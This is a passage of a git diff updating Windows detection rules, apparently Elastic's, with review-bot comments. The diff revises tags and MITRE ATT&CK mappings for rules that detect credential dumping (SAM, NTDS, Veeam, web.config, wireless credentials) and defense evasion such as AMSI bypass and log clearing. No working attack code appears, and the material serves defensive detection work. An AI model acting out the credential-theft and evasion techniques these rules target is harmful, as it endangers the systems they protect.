@@ -82,17 +82,7 @@ Special Logon (Success)
 ```
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Lateral Movement",
- "Tactic: Credential Access",
- "Resources: Investigation Guide",
- "Use Case: Active Directory Monitoring",
- "Data Source: Active Directory",
- "Data Source: Windows Security Event Logs",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Resources: Investigation Guide", "Use Case: Active Directory Monitoring", "Data Source: Active Directory", "Data Source: Windows Security Event Logs"]
 type = "eql"
 query = '''
@@ -108,36 +98,18 @@ sequence by winlog.computer_name, winlog.event_data.SubjectLogonId with maxspan=
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1003.002"
 name = "Security Account Manager"
 reference = "https://attack.mitre.org/techniques/T1003/002/"
-[[rule.threat.technique.subtechnique]]
-id = "T1003.004"
-name = "LSA Secrets"
-reference = "https://attack.mitre.org/techniques/T1003/004/"
-
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1021"
-name = "Remote Services"
-reference = "https://attack.mitre.org/techniques/T1021/"
-
-
-[rule.threat.tactic]
-id = "TA0008"
-name = "Lateral Movement"
-reference = "https://attack.mitre.org/tactics/TA0008/"
-
diff --git a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml
index a019bfa0a69..0e658d8cb0b 100644
--- a/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml
+++ b/rules/windows/credential_access_symbolic_link_to_shadow_copy_created.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/12/25"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -93,20 +93,7 @@ This event will only trigger if symbolic links are created from a new process sp
 Direct access to a shell and calling symbolic link creation tools will not generate an event matching this rule.
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Resources: Investigation Guide",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Windows Security Event Logs",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: Sysmon",
- "Data Source: SentinelOne",
- "Data Source: Crowdstrike",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -124,24 +111,26 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
-[[rule.threat.technique.subtechnique]]
-id = "T1003.002"
-name = "Security Account Manager"
-reference = "https://attack.mitre.org/techniques/T1003/002/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1003.003"
-name = "NTDS"
-reference = "https://attack.mitre.org/techniques/T1003/003/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1006"
+name = "Direct Volume Access"
+reference = "https://attack.mitre.org/techniques/T1006/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/windows/credential_access_veeam_backup_dll_imageload.toml b/rules/windows/credential_access_veeam_backup_dll_imageload.toml
index 0af9521613a..a78053119d7 100644
--- a/rules/windows/credential_access_veeam_backup_dll_imageload.toml
+++ b/rules/windows/credential_access_veeam_backup_dll_imageload.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/14"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/01/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
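Review bot: The `@@ -124,24 +111,26 @@` hunk adds a Defense Evasion entry with T1006 Direct Volume Access to credential_access_symbolic_link_to_shadow_copy_created.toml, while the `@@ -89,36 +89,18 @@` hunk for credential_access_wbadmin_ntds.toml later in this diff removes exactly that entry, and neither hunk records why the two rules now diverge. Both rules appear to cover reaching credential stores through a volume-level copy rather than the live files, so either the mapping should presumably match in both or the reason for the difference belongs in the PR description. Dropping the T1003.002 and T1003.003 sub-techniques here also removes the SAM/NTDS specificity the rule previously carried; if those sub-techniques are no longer justified by the query, a one-line rationale in the description would save the next reviewer from having to infer it.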
@@ -77,36 +77,13 @@ Veeam Backup software is crucial for data protection, enabling secure backup and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/windows/credential_access_veeam_commands.toml b/rules/windows/credential_access_veeam_commands.toml
index 26d95dd353c..b6b0c4da319 100644
--- a/rules/windows/credential_access_veeam_commands.toml
+++ b/rules/windows/credential_access_veeam_commands.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/14"
 integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -64,21 +64,7 @@ references = ["https://thedfirreport.com/2021/12/13/diavol-ransomware/"]
 risk_score = 47
 rule_id = "b661f86d-1c23-4ce7-a59e-2edbdba28247"
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Tactic: Credential Access",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Windows Security Event Logs",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: Sysmon",
- "Data Source: SentinelOne",
- "Data Source: Crowdstrike",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -94,36 +80,13 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/windows/credential_access_wbadmin_ntds.toml b/rules/windows/credential_access_wbadmin_ntds.toml
index d8e4b5920ef..159f6ad96c9 100644
--- a/rules/windows/credential_access_wbadmin_ntds.toml
+++ b/rules/windows/credential_access_wbadmin_ntds.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/06/05"
 integration = ["windows", "endpoint", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -89,36 +89,18 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1003"
 name = "OS Credential Dumping"
 reference = "https://attack.mitre.org/techniques/T1003/"
-[[rule.threat.technique.subtechnique]]
-id = "T1003.002"
-name = "Security Account Manager"
-reference = "https://attack.mitre.org/techniques/T1003/002/"
 [[rule.threat.technique.subtechnique]]
 id = "T1003.003"
 name = "NTDS"
 reference = "https://attack.mitre.org/techniques/T1003/003/"
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1006"
-name = "Direct Volume Access"
-reference = "https://attack.mitre.org/techniques/T1006/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/windows/credential_access_web_config_file_access.toml b/rules/windows/credential_access_web_config_file_access.toml
index e8bd3d77a6c..f4cc7db11aa 100644
--- a/rules/windows/credential_access_web_config_file_access.toml
+++ b/rules/windows/credential_access_web_config_file_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/07/23"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/01/19"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -55,14 +55,7 @@ references = [
 risk_score = 73
 rule_id = "5841b80f-a1f8-4c00-a966-d2cc4a7a82e4"
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide"
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -79,18 +72,34 @@ event.category:file and host.os.type:windows and event.action:open and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.executable", "user.id"]
diff --git a/rules/windows/credential_access_wireless_creds_dumping.toml b/rules/windows/credential_access_wireless_creds_dumping.toml
index fb71341678b..92be7b8f51b 100644
--- a/rules/windows/credential_access_wireless_creds_dumping.toml
+++ b/rules/windows/credential_access_wireless_creds_dumping.toml
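Review bot: The `@@ -79,18 +72,34 @@` hunk writes the new Collection entry without the blank separator lines that the same hunk uses for the Credential Access entry: `+reference = "https://attack.mitre.org/techniques/T1005/"` is immediately followed by `+[rule.threat.tactic]`, and `+reference = "https://attack.mitre.org/tactics/TA0009/"` by `+[[rule.threat]]`, so one threat block now mixes two layouts. The same uneven spacing shows up elsewhere in this diff (for instance the first threat entry in the `@@ -125,52 +118,57 @@` hunk gains no blank before its new sub-technique table while the later entries do), which suggests the files were edited by hand rather than emitted by a single formatter. If the repository has a normalizing step for rule TOML, running it over these files would make the layout uniform and keep later diffs smaller.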
@@ -2,7 +2,7 @@
 creation_date = "2022/11/01"
 integration = ["endpoint", "system", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -96,21 +96,7 @@ references = [
 risk_score = 73
 rule_id = "2de87d72-ee0c-43e2-b975-5f0b029ac600"
 severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Windows",
- "Use Case: Threat Detection",
- "Tactic: Credential Access",
- "Tactic: Discovery",
- "Data Source: Elastic Endgame",
- "Resources: Investigation Guide",
- "Data Source: Elastic Defend",
- "Data Source: Windows Security Event Logs",
- "Data Source: Microsoft Defender for Endpoint",
- "Data Source: Sysmon",
- "Data Source: SentinelOne",
- "Data Source: Crowdstrike",
-]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -123,31 +109,13 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
 [[rule.threat.technique]]
 id = "T1555"
 name = "Credentials from Password Stores"
 reference = "https://attack.mitre.org/techniques/T1555/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
-
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
-
diff --git a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml
index ab0b32e27a3..c6f704addd6 100644
--- a/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml
+++ b/rules/windows/defense_evasion_adding_the_hidden_file_attribute_with_via_attribexe.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/02/18"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/07/02"
+updated_date = "2026/03/23"
 [transform]
 [[transform.osquery]]
@@ -104,21 +104,7 @@ This rule looks for the execution of the `attrib.exe` utility with a command lin risk_score = 21 rule_id = "4630d948-40d4-4cef-ac69-4002e29bc3db" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" 
@@ -140,36 +126,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1222" -name = "File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/" -[[rule.threat.technique.subtechnique]] -id = "T1222.001" -name = "Windows File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/001/" - [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/defense_evasion_amsi_bypass_powershell.toml b/rules/windows/defense_evasion_amsi_bypass_powershell.toml index f239ebb7b8f..e158e20003b 100644 --- a/rules/windows/defense_evasion_amsi_bypass_powershell.toml +++ b/rules/windows/defense_evasion_amsi_bypass_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/17" integration = ["windows"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -132,39 +132,21 @@ event.category:"process" and host.os.type:windows and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml b/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml index b3493761554..c3b090952e3 100644 --- a/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml +++ b/rules/windows/defense_evasion_audit_policy_disabled_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/14" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
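Review bot: The Execution tactic block (T1059.001 under TA0002) is removed from defense_evasion_amsi_bypass_powershell.toml, but the patch carries no hunk for this file's `tags` array, unlike the other rules in this series where the matching `"Tactic: Execution"` tag is dropped in the same commit. If `tags` here still lists `"Tactic: Execution"`, the tag and the threat mapping now disagree and any tag-versus-tactic consistency check will report this rule as carrying an orphaned tactic tag. The same shape appears in defense_evasion_defender_exclusion_via_powershell.toml, whose Execution block is removed without a tags hunk either. Please confirm both files' `tags` arrays contain no `Tactic:` entry that no longer has a `[[rule.threat]]` block behind it.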
@@ -96,34 +96,18 @@ event.code : "4719" and host.os.type : "windows" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" -[[rule.threat.technique.subtechnique]] -id = "T1070.001" -name = "Clear Windows Event Logs" -reference = "https://attack.mitre.org/techniques/T1070/001/" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" -[[rule.threat.technique.subtechnique]] -id = "T1562.006" -name = "Indicator Blocking" -reference = "https://attack.mitre.org/techniques/T1562/006/" - - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_clearing_windows_console_history.toml b/rules/windows/defense_evasion_clearing_windows_console_history.toml index f05d40e1010..7e23d925997 100644 --- a/rules/windows/defense_evasion_clearing_windows_console_history.toml +++ b/rules/windows/defense_evasion_clearing_windows_console_history.toml @@ -2,7 +2,7 @@ creation_date = "2021/11/22" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/23" [rule] author = ["Austin Songer"] 
@@ -64,21 +64,7 @@ references = [ risk_score = 47 rule_id = "b5877334-677f-4fb9-86d5-a9721274223b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -101,36 +87,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.003" name = "Clear Command History" reference = "https://attack.mitre.org/techniques/T1070/003/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - 
diff --git a/rules/windows/defense_evasion_clearing_windows_event_logs.toml b/rules/windows/defense_evasion_clearing_windows_event_logs.toml index c2f04f5a873..942482a1f80 100644 --- a/rules/windows/defense_evasion_clearing_windows_event_logs.toml +++ b/rules/windows/defense_evasion_clearing_windows_event_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -98,24 +98,28 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.001" name = "Clear Windows Event Logs" reference = "https://attack.mitre.org/techniques/T1070/001/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.002" name = "Disable Windows Event Logging" reference = "https://attack.mitre.org/techniques/T1562/002/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml index 7e89e09c3a2..f8fae831aa8 100644 --- a/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml +++ b/rules/windows/defense_evasion_code_signing_policy_modification_registry.toml 
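Review bot: The added `[[rule.threat.technique]]` block for T1562 repairs a subtechnique nested under the wrong parent: on the old side `T1562.002` followed the `T1070.001` subtechnique directly, so it was recorded as a child of T1070. Nothing in the rule file itself can stop this from recurring, so it is worth pairing the fix with a check in the threat-mapping unit test that rejects a subtechnique whose id prefix (`T1562` in `T1562.002`) differs from its parent technique's `id`; the ids are already in the file, so the check needs no external data.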
@@ -2,7 +2,7 @@ creation_date = "2023/01/31" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -126,24 +126,18 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" reference = "https://attack.mitre.org/techniques/T1553/" + [[rule.threat.technique.subtechnique]] id = "T1553.006" name = "Code Signing Policy Modification" reference = "https://attack.mitre.org/techniques/T1553/006/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml index bbf8c289d02..90f5cb482fd 100644 --- a/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml +++ b/rules/windows/defense_evasion_communication_apps_suspicious_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
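Review bot: The `T1112` (Modify Registry) technique is dropped from defense_evasion_code_signing_policy_modification_registry.toml even though the rule fires on `registry where host.os.type == "windows" and event.type == "change"`, yet defense_evasion_defender_disabled_via_registry.toml, which has the same registry-change query, keeps its `T1112` mapping later in this series. The two registry-modification rules should be treated the same way: either restore the removed `[[rule.threat.technique]]` block with `id = "T1112"` here or drop it there as well. Otherwise technique-coverage reports for Modify Registry will list one of the two rules and not the other for no reason visible in the rules.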
@@ -18,17 +18,7 @@ name = "Suspicious Communication App Child Process" risk_score = 47 rule_id = "adbfa3ee-777e-4747-b6b0-7bd645f30880" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Data Source: SentinelOne", "Data Source: Elastic Endgame"] timestamp_override = "event.ingested" type = "eql" 
@@ -237,41 +227,31 @@ Communication apps like Slack, WebEx, and Teams are integral to modern workflows [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" [[rule.threat.technique.subtechnique]] id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_defender_disabled_via_registry.toml b/rules/windows/defense_evasion_defender_disabled_via_registry.toml index 6194cfb8572..14fbccc9270 100644 --- a/rules/windows/defense_evasion_defender_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_defender_disabled_via_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2025/03/20" +updated_date = 